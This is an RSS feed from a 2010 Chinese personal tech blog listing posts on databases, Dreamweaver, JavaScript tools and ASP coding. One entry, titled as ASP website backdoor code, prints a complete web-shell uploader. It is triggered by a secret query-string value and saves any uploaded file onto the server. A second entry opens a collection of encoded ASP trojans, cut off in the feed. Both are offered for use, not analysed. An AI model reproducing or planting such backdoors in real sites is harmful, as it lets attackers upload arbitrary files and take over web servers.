<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>Dollar's Blog</title><link>http://www.yxer.com/dollar/</link><description>梅超：逝者如斯夫，不舍昼夜！</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>Copyright Dollar's Blog. Some Rights Reserved.</copyright><pubDate>Sat, 10 Jul 2010 20:42:28 +0800</pubDate><item><title>MSSQL2005日志文件LDF丢失的恢复方法</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/SQL2005-LDF.html</link><pubDate>Sat, 10 Jul 2010 20:34:52 +0800</pubDate><guid>http://www.yxer.com/dollar/post/SQL2005-LDF.html</guid><description><![CDATA[<p>以前也碰到过这个问题，那时候在网上搜索了一大堆解决办法都没有解决，最后就放弃了数据库，今天终于找到简单有效的办法了，希望能给正在为这个问题苦恼的朋友带来帮助。</p>]]></description><category>经验技巧</category><comments>http://www.yxer.com/dollar/post/SQL2005-LDF.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=54</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=54&amp;key=930116c6</trackback:ping></item><item><title>DreamWeaver使用正则表达式替换</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/DreamWeaver-zhengze.html</link><pubDate>Tue, 01 Jun 2010 18:15:11 +0800</pubDate><guid>http://www.yxer.com/dollar/post/DreamWeaver-zhengze.html</guid><description><![CDATA[<p>使用Dreamweaver 的站点搜索替换功能。就是它，里面还有一个我们不会注意强大功能，使用正则表达式。<br />查看了一下资料，找到如下内容：正则表达式是以文本描述字符组合的模式。在代码搜索中使用它们有助于描述一些概念，例如&ldquo;以&lsquo;var&rsquo;开始的行&rdquo;和&ldquo;包含数字的属性值&rdquo;。<br /><br />下表列出了在正则表达式中使用的特殊字符、其含义和用法示例。若要搜索包含该表中某一特殊字符的文本，请在特殊字符前面附加一个反斜杠，令其&ldquo;转义&rdquo;。例如，若要在 some conditions apply* 短语中搜索实际的星号，您的搜索模式应类似于：apply\*。如果您没有令星号转义，您将找到&ldquo;apply&rdquo;的所有匹配项（以及&ldquo;appl&rdquo;、&ldquo;applyy&rdquo;和&ldquo;applyyy&rdquo;的所有匹配项），而不只是后面跟有星号的那些匹配项。<br />...</p>]]></description><category>经验技巧</category><comments>http://www.yxer.com/dollar/post/DreamWeaver-zhengze.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=53</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=53&amp;key=94d0527e</trackback:ping></item><item><title>JS Packer</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/JS-Packer.html</link><pubDate>Mon, 31 May 2010 22:53:11 +0800</pubDate><guid>http://www.yxer.com/dollar/post/JS-Packer.html</guid><description><![CDATA[<p><meta content="a javascript compressor/obfuscator" name="description" /></p><script language="javascript" type="text/javascript">/* packer, version 2.0.2 (2005-08-19) Copyright 2005, Dean Edwards...</script><p>JS Packer</p>]]></description><category>乱七八糟</category><comments>http://www.yxer.com/dollar/post/JS-Packer.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=51</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=51&amp;key=c0e7c6ad</trackback:ping></item><item><title>asp网站后门代码</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/50.html</link><pubDate>Mon, 31 May 2010 16:34:00 +0800</pubDate><guid>http://www.yxer.com/dollar/post/50.html</guid><description><![CDATA[<p>&lt;%if request.QueryString(&quot;door&quot;)=&quot;dollar&quot; then <br />a=Request.TotalBytes:if a Then b=&quot;adodb.stream&quot;:Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&amp;chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet=&quot;BIG5&quot;:i=h.Readtext:h.close:j=mid(i,InstrRev(i,&quot;\&quot;)+1,g):k=Instrb(d,e&amp;e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%&gt;&lt;form enctype=multipart/form-data method=post&gt;&lt;input type=file name=n&gt;&lt;input type=submit&gt;&lt;/form&gt; <br />&lt;%end if%&gt;</p>]]></description><category>乱七八糟</category><comments>http://www.yxer.com/dollar/post/50.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=50</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=50&amp;key=9ed0186c</trackback:ping></item><item><title>zencart模板制作修改说明</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/zencart-template.html</link><pubDate>Wed, 19 May 2010 19:40:58 +0800</pubDate><guid>http://www.yxer.com/dollar/post/zencart-template.html</guid><description><![CDATA[<p>Zen Cart的模板设计比较复杂，需要一定的时间来熟悉。一旦你了解了它的结构，就会慢慢习惯了。<br /><br />首先要阅读常见问答部分的：如何添加、制作新模板。 Zen Cart的设计没有什么特别，与以前设计HTML页面是一样的。只是整个页面分成了好几个部分，并加入了PHP代码。<br /><br />通常，页面分为页眉(header)，页脚(footer)，边框(sideboxes)。所以设计页面的时候，要记住Zen Cart是如何组织这些页面的。<br /><br />...</p>]]></description><category>网站技术</category><comments>http://www.yxer.com/dollar/post/zencart-template.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=49</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=49&amp;key=91f2bc8d</trackback:ping></item><item><title>msn8.5 for win2003/win2008下载并解决xp下强制安装新版本的问题</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/msn8.5-for-win2003-2008.html</link><pubDate>Tue, 18 May 2010 17:22:44 +0800</pubDate><guid>http://www.yxer.com/dollar/post/msn8.5-for-win2003-2008.html</guid><description><![CDATA[win2003 不能装exe版的 msn8.5 。可以装 msi格式的安装包。装上后到开始菜单程序里可以找到。下载地址一：http://soft4.wmzhe.com/software/ffzy/MsnMsgs.CAB 用迅雷下。然后rar解压出来就是msi安装包了。下载地址二：http://dl-sh-ocn-1.pchome.net/08/pc/wlm_85_1302_1018_cn.msi&nbsp;用迅雷下下载地址三：http://download.pchome.net/internet...]]></description><category>乱七八糟</category><comments>http://www.yxer.com/dollar/post/msn8.5-for-win2003-2008.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=48</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=48&amp;key=9a2e6d5e</trackback:ping></item><item><title>JS Unicode在线加密与解密工具</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/JS-Unicode.html</link><pubDate>Sat, 08 May 2010 08:51:30 +0800</pubDate><guid>http://www.yxer.com/dollar/post/JS-Unicode.html</guid><description><![CDATA[var classObj=     {       ToUnicode:function(str)        {        return escape(str).replace(/%/g,"\\").toLowerCase();       },           UnUnicode:function(str)       {        return unescape(str.replace(/\\/g, "%"));       },      copyingTxt:functi...]]></description><category>网站技术</category><comments>http://www.yxer.com/dollar/post/JS-Unicode.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=47</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=47&amp;key=3d0ecced</trackback:ping></item><item><title>Access 转成 MSSQL 2000/2005 数据库方法及工具</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/Access-to-MSSQL.html</link><pubDate>Sat, 24 Apr 2010 00:45:27 +0800</pubDate><guid>http://www.yxer.com/dollar/post/Access-to-MSSQL.html</guid><description><![CDATA[在安装依然主机管理系统时，因为当时导入MSSQL时有点问题，所以，为了赶快能用上管理功能，所以就暂时先用了Access数据库。不过一直以来都因为速度问题困扰不已，一直以为是由于ASP.Net的效率问题造成的。不过一次在群里有位朋友说Access数据库是比较慢，改用MSSQL以后速度会有所改善。于是开始设法将现有的Access数据库导入到MSSQL 2005中。以前也尝试导入过，但是用SQL Server自带的DTS服务直接导入（先用sql脚本创建好表结构，否则会丢失标识等），会出现下列错误：- ...]]></description><category>经验技巧</category><comments>http://www.yxer.com/dollar/post/Access-to-MSSQL.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=46</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=46&amp;key=8bbf1611</trackback:ping></item><item><title>asp网站防注入代码</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/fangzhuru.html</link><pubDate>Fri, 23 Apr 2010 12:39:59 +0800</pubDate><guid>http://www.yxer.com/dollar/post/fangzhuru.html</guid><description><![CDATA[代码一:&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;%&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &amp;apos;--------定义部份------------------&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Dim&nbsp;&nbsp; Fy_Post,Fy_Get,Fy...]]></description><category>网站技术</category><comments>http://www.yxer.com/dollar/post/fangzhuru.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=45</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=45&amp;key=db0f4118</trackback:ping></item><item><title>ASP小马集合</title><author>a@b.com (meichao)</author><link>http://www.yxer.com/dollar/post/xiaoma.html</link><pubDate>Wed, 14 Apr 2010 11:32:23 +0800</pubDate><guid>http://www.yxer.com/dollar/post/xiaoma.html</guid><description><![CDATA[①号小马________________________________________________________________&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=gb2312&quot;&gt;&lt;title&gt;Cx~&lt;/title&gt;&lt;%@ LANGUAGE = VBScript.Encode %&gt;&lt;%#@~^CgAAAA==[b...]]></description><category>乱七八糟</category><comments>http://www.yxer.com/dollar/post/xiaoma.html#comment</comments><wfw:comment>http://www.yxer.com/dollar/</wfw:comment><wfw:commentRss>http://www.yxer.com/dollar/feed.asp?cmt=44</wfw:commentRss><trackback:ping>http://www.yxer.com/dollar/cmd.asp?act=tb&amp;id=44&amp;key=db1557f6</trackback:ping></item></channel></rss>
